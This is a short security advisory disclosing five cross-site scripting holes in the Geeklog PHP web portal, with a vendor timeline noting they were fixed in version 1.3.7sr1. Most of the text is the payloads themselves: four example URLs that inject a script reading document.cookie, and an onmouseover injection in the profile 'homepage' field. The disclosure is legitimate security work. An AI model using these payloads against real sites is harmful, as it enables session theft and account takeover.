nothing new. typical XSS bugs. summary ======= Geeklog is a web portal system written in PHP. There exists 5 XSS holes in the software. the 'holes' =========== --1-- http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)</script> --2-- http://vulnerable.host/users.php?mode=profile&uid=<script>alert(document.cookie)</script> --3-- http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script> --4-- http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script> --5-- 'homepage' field in the user's account information page is not sanitised properly. As a result, javascript can be injected by setting the 'homepage' field like this: http://url"; onmouseover="alert(document.cookie) ** 3) & 4) were found by Dirk Haun of Geeklog Team. vendor status ============= 03/01/2003 contacted Dirk Haun of Geeklog team 14/01/2003 Geeklog 1.3.7sr1 was released. New version closes all holes found. --==snooq==--
